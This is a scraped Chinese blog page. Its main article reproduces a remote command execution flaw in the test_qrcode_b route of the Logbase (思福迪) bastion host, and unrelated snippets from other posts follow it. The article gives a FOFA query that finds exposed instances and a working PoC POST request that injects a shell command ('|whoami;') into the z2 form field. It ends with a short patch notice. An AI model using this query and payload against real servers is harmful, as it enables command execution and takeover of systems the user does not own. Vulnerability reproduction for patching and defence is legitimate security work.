当前位置：首页 > news >正文

思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

news 2026/5/18 2:24:53

0x01 产品简介

思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。

0x02 漏洞概述

由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x03 复现环境

FOFA：

((title="Logbase" || header="Server: dummy" || body="onclick=\"location.href='trustcert.cgi'") && body!="couchdb") || banner="Server: dummy"

0x04 漏洞复现

PoC

POST /bhost/test_qrcode_b HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Referer: https://your-ip
Accept-Encoding: gzip
Connection: closez1=1&z2="|whoami;"&z3=bhost

0x05 修复建议

厂商已发布了漏洞修复程序，请及时关注更新:

http://www.logbase.cn/

思福迪运维安全管理系统 test_qrcode_b RCE漏洞复现

0x01 产品简介思福迪运维安全管理系统是思福迪开发的一款运维安全管理堡垒机。 0x02 漏洞概述由于思福迪运维安全管理系统 test_qrcode_b路由存在命令执行漏洞，攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限&#…...

编程日记 2023/12/14 17:16:59

Salesforce×阿里云，影响几何？

实际上，从这个视角来看，Salesforce和阿里云的合作也恰在成为着这个市场的一个新催化剂。“期待Salesforce能给中国市场带来一些新的增量，包括对合作伙伴的态度，对产品的态度等等。”一位CRM相关人士告诉我们。那么，阿…...

编程日记 2023/12/14 17:15:58

Qt对excel操作

Qt库中自带对excel操作的模块QAxObject，QAxObject是Qt提供给程序员从代码中访问Office的对象类，其本质上是一个面向微软操作系统的COM接口。 QAxObject将所有Office的工作簿、表格、文档等都作为其子对象，程序员通过调用querySubObject()这个…...

编程日记 2023/12/14 17:14:57

每日一练 | 华为认证真题练习Day148

1、关于RSTP协议提供的保护功能说法正确的有?（多选） A. Root保护功能只能在指定端口上配置生效 B. 环路保护功能只能在根端口或Alternate端口上配置生效 C. 启用防TC— BPDU报文攻击功能后，可以避免频繁的删除HAC地址表项 D. 交换设备上…...

编程日记 2023/12/14 17:12:55

ES6学习(二):解构赋值

前言解构赋值是ES6中新提出的语法,简单并且实用,数组和对象都可以使用数组解构赋值规则 1.其实是按照顺序一一匹配的,就像排队领取物资一样,你领到什么就是什么,没有挑的份,你排的晚了什么都没领到,那就是undifined。 2.如果给分配的是一个数组,那可以在命名时外部嵌套…...

编程日记 2023/12/14 17:11:54

安装kubebuilder前需要有kubernetes环境和golang环境官网：https://go.kubebuilder.io/ 安装kubebuilder #下载 wget https://go.kubebuilder.io/dl/latest/$(go env GOOS)/$(go env GOARCH) #改名kubebuilder后加权限 chmod x kubebuilder #放到环境变量里 mv k…...

编程日记 2023/12/14 17:10:54

docker中启动ES报错：AccessDeniedException: /usr/share/elasticsearch/data/nodes

一、K8S部署的elasticsearch 6.8版本数据持久化到本地磁盘今天做elasticsearch数据迁移，直接 SCP拷贝至另外一台服务器原服务器处理好后拷贝回来，然后启动elasticsearch报错 {"type": "server", "timestamp": "2…...

编程日记 2023/12/14 17:09:53

java集成Nacos服务

1，添加依赖：首先，在你的 Java 项目中，你需要添加 Nacos 客户端 SDK 的依赖 <dependency><groupId>com.alibaba.nacos</groupId><artifactId>nacos-client</artifactId><version>2.1.1</ve…...

编程日记 2023/12/14 17:08:52

开源IPad Pro应用IDE：使用SSH远程连接服务器进行云端编程开发

🔥博客主页： 小羊失眠啦. 🎥系列专栏：《C语言》《数据结构》《Linux》《Cpolar》 ❤️感谢大家点赞👍收藏⭐评论✍️ 前些天发现了一个巨牛的人工智能学习网站，通俗易懂，风趣幽默，…...

编程日记 2023/12/14 17:07:51

ubuntu 自动安装 MKL Intel fortran 编译器 ifort 及完美平替

首先据不完全观察，gfortran 与 openblas是 intel fortran 编译器 ifotr和mkl的非常优秀的平替，openblas连函数名都跟mkl一样，加了一个下划线。 1， 概况 https://www.intel.com/content/www/us/en/developer/tools/oneapi/base-too…...

编程日记 2023/12/14 17:06:50

elementui select中添加新增标签

<el-select v-model"ruleForm.eventType" :placeholder"请选择事件类型，可手动添加" ref"template" clearable visible-change"(v) > visibleChange(v, template)"><el-option v-for"item in eventTypeOp…...

编程日记 2023/12/14 17:05:50

图像截屏公式识别——LaTeX-OCR安装与使用

一、简介 LaTeX-OCR 是一个开源的光学字符识别（OCR）软件，专为 LaTeX 文档提供支持。其主要目的是帮助用户将扫描的文档转换为 LaTeX 编辑器可以使用的可编辑文本，从而方便进行修改、编辑和排版。LaTeX广泛用于科技、数学、工程等…...

编程日记 2023/12/14 17:03:48

LabVIEW与Tektronix示波器实现电源测试自动化

LabVIEW与Tektronix示波器实现电源测试自动化在现代电子测试与测量领域，自动化测试系统的构建是提高效率和精确度的关键。本案例介绍了如何利用LabVIEW软件结合Tektronix MDO MSO DPO2000/3000/4000系列示波器，开发一个自动化测试项目。该项目旨在自动…...

编程日记 2023/12/14 17:02:47

青少年CTF-Crypto(Morse code/ASCII和凯撒)

FLAG：你这一生到底想干嘛专研方向: Web安全 ，Md5碰撞每日emo：不要因为别人都交卷了，就乱选答案文章目录 1.Morse code2、ASCII和凯撒的约定 1.Morse code 题目提示摩尔斯电码，这个是给的附件直接用摩尔斯解密&am…...

编程日记 2023/12/14 17:00:44

Vue3-16-【v-model】表单数据绑定

作用描述 v-model 指令，实现了表单输入组件的值与 js 中的变量的值的绑定关系。当我们在页面上执行输入动作时，js中变量的值也会同步发生变化。表单不仅仅局限于输入框，其他的如 ： 单选按钮，复选框，下拉…...

编程日记 2023/12/14 16:59:43

【Flink on k8s】- 12 - Flink kubernetes operator 的高级特性

目录 1、自动伸缩 1.1 工作原理 1.2 Job 要求和限制 1.2.1 要求 1.2.2 限制...

编程日记 2023/12/14 16:56:41

量子芯片技术：未来的计算革命

量子芯片技术：未来的计算革命一、引言随着科技的不断发展，人类正在进入一个全新的技术时代，即量子时代。量子芯片技术作为这个时代的重要代表，正逐渐改变我们对计算和信息处理的理解。本文将深入探讨量子芯片技术的基本原理、…...

编程日记 2023/12/14 16:53:39

vaptcha-手势验证码

很外向，上班总想坐老板的位置。网址：https://www.vaptcha.com/#demo 第一次接触是在大学刚毕业的时候，搞了一半就没搞了。时隔1年多，回来看看。难点，图片还原，轨迹，canvas校验等。轨迹的…...

编程日记 2023/12/14 16:52:38

【一种用opencv实现高斯曲线拟合的方法】

背景： 项目中需要实现数据的高斯拟合，进而提取数据中标准差，手头只有opencv库，经过资料查找验证，总结该方法。基础知识： 1、opencv中solve可以实现对矩阵参数的求解； 2、线的拟合就是对多项…...

编程日记 2023/12/14 16:44:30

find_package 和 find_library的区别

背景经常看CMakeLists.txt中有find_package和find_library，有时候没留意以为都一样，其实二者差距比较大，下面简单记录一下。 find_package find_package(NAME), 这段代码的本质就是在找一个NAME.cmake这个文件，一般在安装库的…...

编程日记 2023/12/14 16:42:29